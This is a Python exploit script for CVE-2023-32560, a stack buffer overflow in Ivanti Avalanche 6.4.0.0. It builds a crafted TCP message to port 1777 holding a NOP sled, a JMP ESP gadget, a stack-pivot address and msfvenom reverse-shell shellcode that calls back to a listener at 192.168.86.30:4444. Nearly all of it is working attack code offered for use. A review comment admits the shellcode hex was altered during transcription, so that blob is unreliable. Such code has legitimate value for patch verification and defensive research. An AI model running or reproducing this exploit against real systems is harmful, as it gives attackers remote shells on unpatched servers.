'''
Exploit Title: Ivanti Avalanche v6.4.0.0 - Remote Code Execution
Date: 2023-08-16
Exploit Author: Robel Campbell (@RobelCampbell)
Vendor Homepage: https://www.ivanti.com/
Software Link: https://www.wavelink.com/download/downloads.aspx?downloadfile=27550&returnurl=/download-avalanche_mobile-device-management-software/
Version: v6.4.0.0
Tested on: Windows 11 21H2
CVE: CVE-2023-32560
Reference: https://www.tenable.com/security/research/tra-2023-27

Sends a single crafted message to the Avalanche service (TCP/1777 by default)
whose oversized header item overflows a stack buffer. The embedded shellcode is
an msfvenom reverse shell with the author's LHOST/LPORT baked in; regenerate it
for your own listener before use.
'''
import socket
import struct
import sys
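# Item: one (type, name, value) entry; used for both the header and the payload.
class Item:
    """One entry of the message body.

    On-wire layout (see ``pack``): three little-endian 32-bit ints
    ``type, name_size, value_size`` followed by ``name`` and ``value``, each
    written into a fixed-width field of ``name_size`` / ``value_size`` bytes.

    Args:
        type_: numeric item type written as the first field.
        name: item name (str); stored UTF-8 encoded.
        value: item value bytes.
        name_size: width of the name field. Defaults to 0x5, which is
            exactly the length of the ``'pwned'`` name the exploit uses.
        value_size: width of the value field. Defaults to 0x800, the size
            of the overflow buffer.
    """

    def __init__(self, type_, name, value, name_size=0x5, value_size=0x800):
        self.type = type_
        self.name = name.encode()
        self.value = value
        self.name_size = name_size
        self.value_size = value_size

    def pack(self):
        """Serialise the item.

        Returns:
            bytes of length ``12 + name_size + value_size``.

        Note:
            struct's ``s`` format pads short fields with NULs and silently
            truncates long ones. The exploit relies on that for its dummy
            payload item (a 0x1000-byte value in a 0x800-byte field), so no
            length check is done here; the overflow buffer itself is sized
            to exactly ``value_size`` by its builder.
        """
        # Explicit little-endian, standard sizes: the target is x86 Windows
        # and the wire format must not depend on the attacker host's ABI.
        fmt = '<iii{}s{}s'.format(self.name_size, self.value_size)
        return struct.pack(
            fmt,
            self.type,
            self.name_size,
            self.value_size,
            self.name,
            self.value,
        )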
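# HP: message body = header items + payload items + NUL padding.
class HP:
    """Message body: header items followed by payload items, NUL-padded.

    Args:
        hdr: list of objects with a ``pack()`` method (header items).
        payload: list of objects with a ``pack()`` method (payload items).

    Attributes:
        pad: NUL bytes appended after the packed items so the body ends on a
            16-byte boundary. Computed once from the items passed to the
            constructor; mutating ``hdr``/``payload`` afterwards does not
            update it.
    """

    def __init__(self, hdr, payload):
        self.hdr = hdr
        self.payload = payload
        # The published listing derived the padding from the *number* of
        # items (len of the two lists) rather than from the packed byte
        # length. For the 1+1 items this exploit sends both formulas give
        # 14 bytes (4130 packed bytes % 16 == 2), so the wire bytes are
        # unchanged; padding the byte length is what makes the whole
        # message (16-byte preamble + body) 16-byte aligned. As in the
        # original formula, an already-aligned body still gets 16 bytes.
        self.pad = b'\x00' * (16 - len(self._packed_items()) % 16)

    def _packed_items(self):
        """Concatenate the packed header items, then the packed payload items."""
        hdr_bytes = b''.join(item.pack() for item in self.hdr)
        payload_bytes = b''.join(item.pack() for item in self.payload)
        return hdr_bytes + payload_bytes

    def pack(self):
        """Return the packed items followed by ``pad``."""
        return self._packed_items() + self.pad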
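# Preamble: the 16-byte size header that precedes the body.
class Preamble:
    """Fixed 16-byte header carrying the sizes of the message that follows.

    Args:
        hp: the body (an ``HP``); must expose ``hdr``, ``payload`` and
            ``pack()``.

    Attributes:
        msg_size: total message length = packed body (items + padding)
            plus the 16 bytes of this preamble.
        hdr_size: sum of the packed header item lengths (no padding).
        payload_size: sum of the packed payload item lengths (no padding).
        unk: fourth field; meaning unknown, 0 worked against the tested build.
    """

    def __init__(self, hp):
        self.msg_size = len(hp.pack()) + 16
        self.hdr_size = sum(len(item.pack()) for item in hp.hdr)
        self.payload_size = sum(len(item.pack()) for item in hp.payload)
        self.unk = 0

    def pack(self):
        """Return the four fields as little-endian 32-bit ints (16 bytes)."""
        # Explicit byte order so the header does not depend on the host ABI.
        return struct.pack('<iiii', self.msg_size, self.hdr_size,
                           self.payload_size, self.unk)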
# Msg: preamble + body, i.e. the complete message that goes on the wire.
class Msg:
    """The complete message: a ``Preamble`` computed from ``hp``, then ``hp``.

    Args:
        hp: the message body (``HP``).
    """

    def __init__(self, hp):
        self.hdrpay = hp
        self.pre = Preamble(hp)

    def pack(self):
        """Return preamble bytes followed by body bytes."""
        parts = (self.pre.pack(), self.hdrpay.pack())
        return b''.join(parts)
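# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.86.30 LPORT=4444 EXITFUNC=thread -f python
#
# Stageless x86 Windows reverse shell. The listener address is baked into the
# bytes (the 0xc0a8561e / 0x115c words below are 192.168.86.30 / 4444), so
# regenerate the payload with the command above for your own LHOST/LPORT.
# NOTE(review): these hex digits are transcribed from the published listing.
# One line arrived with an odd digit count and was repaired by dropping the
# extra digit; treat the whole blob as unverified and regenerate it before use.
_SHELLCODE_HEX = (
    'fce8820000006089e531c064'
    '8b50308b520c8b52148b7228'
    '0fb74a2631ffac3c617c022c'
    '20c1cf0d01c7e2f252578b52'
    '108b4a3c8b4c1178e34801d1'
    '518b592001d38b4918e33a49'
    '8b348b01d631ffacc1cf0d01'
    'c738e075f6037df83b7d2475'
    'e4588b582401d3668b0c4b8b'
    '581c01d38b048b01d0894424'
    '245b5b61595a51ffe05f5f5a'
    '8b12eb8d5d56833200006877'
    '73325f54684c772607ffd5b8'
    '9001000029c454506829806b'
    '00ffd5505050504050405068'
    'ea0fdfe0ffd5976a0568c0a8'
    '561e680200115c89e66a1056'
    '576899a57461ffd585c0740c'
    'ff4e0875ec68f0b5a256ffd5'
    '68636d640089e357575731f6'
    '6a125956e2fd66c744243c01'
    '018d442410c6004454505656'
    '5646564e565656566879cc3f'
    '86ffd589e04e5646ff306808'
    '871d60ffd5bbe01d2a0a68a6'
    '95bd9dffd53c067c0a80fbe0'
    '7505bb4713726f6a0053ffd5'
)
shellcode = bytes.fromhex(_SHELLCODE_HEX)

JMP_ESP = 0x00412b81        # JMP ESP gadget (non-ASLR module, per the listing)
STACK_PIVOT = 0x0052d484    # ADD ESP,0x0FA0 ; RETN 0x0004
OVERFLOW_SIZE = 0x800       # must match Item.value_size of the header item


def build_overflow_buffer(shellcode, size=OVERFLOW_SIZE):
    """Build the header-item value that overflows the target's stack buffer.

    Layout, in order:
        340 x NOP | JMP ESP address | 8 x NOP | shellcode | 80 x 'A'
        | stack-pivot address | 'C' fill up to ``size`` bytes.

    Args:
        shellcode: raw shellcode placed right after the JMP ESP landing pad.
        size: total buffer length; defaults to the 0x800-byte item field.

    Returns:
        bytes of exactly ``size`` bytes.

    Raises:
        ValueError: if the fixed layout plus ``shellcode`` does not fit in
            ``size``. The original listing computed ``b'C' * (0x800 - len)``
            which goes negative (empty) for a long shellcode, and the
            oversized value would then be silently truncated by struct,
            dropping the pivot gadget without any warning.
    """
    fixed = b''.join([
        b'\x90' * 340,
        struct.pack('<I', JMP_ESP),
        b'\x90' * 8,
        shellcode,
        b'A' * 80,
        struct.pack('<I', STACK_PIVOT),
    ])
    if len(fixed) > size:
        raise ValueError(
            'overflow buffer is {} bytes, exceeds the {}-byte field'.format(len(fixed), size)
        )
    return fixed + b'C' * (size - len(fixed))


buf = build_overflow_buffer(shellcode)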
# Assemble the message: the overflow buffer travels in the single header
# item; the payload item is a dummy and is probably not needed at all.
# Note that Item only packs the first 0x800 bytes of buf2 (its value_size).
buf2 = b'A' * 0x1000
hdr = [Item(3, 'pwned', buf)]
payload = [Item(3, 'pwned', buf2)]
hp_instance = HP(hdr, payload)
msg_instance = Msg(hp_instance)
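# Default port of the targeted Avalanche service.
port = 1777


def _parse_target(argv, default_port=port):
    """Extract (host, port) from a command line.

    Args:
        argv: full argument vector (``argv[0]`` is the program name).
        default_port: port used when ``argv[2]`` is absent.

    Returns:
        ``(host, port)`` or ``None`` when no host was given.

    Raises:
        ValueError: if ``argv[2]`` is present but not an integer.
    """
    if len(argv) < 2:
        return None
    host = argv[1]
    target_port = int(argv[2]) if len(argv) > 2 else default_port
    return host, target_port


def main(argv=None):
    """Connect to the target and send the crafted message once.

    Args:
        argv: argument vector; defaults to ``sys.argv``.

    Returns:
        process exit status: 0 after the message was sent, 1 on bad usage.
    """
    argv = sys.argv if argv is None else argv
    try:
        target = _parse_target(argv)
    except ValueError:
        target = None
    if target is None:
        print('Usage: python3 CVE-2023-32560.py <host IP> [port]')
        return 1
    host, target_port = target
    # The context manager closes the socket; no explicit close() needed.
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        # Don't hang forever on a filtered port or an unresponsive service.
        s.settimeout(10)
        s.connect((host, target_port))
        s.sendall(msg_instance.pack())
    print('Message sent!')
    return 0


if __name__ == '__main__':
    sys.exit(main())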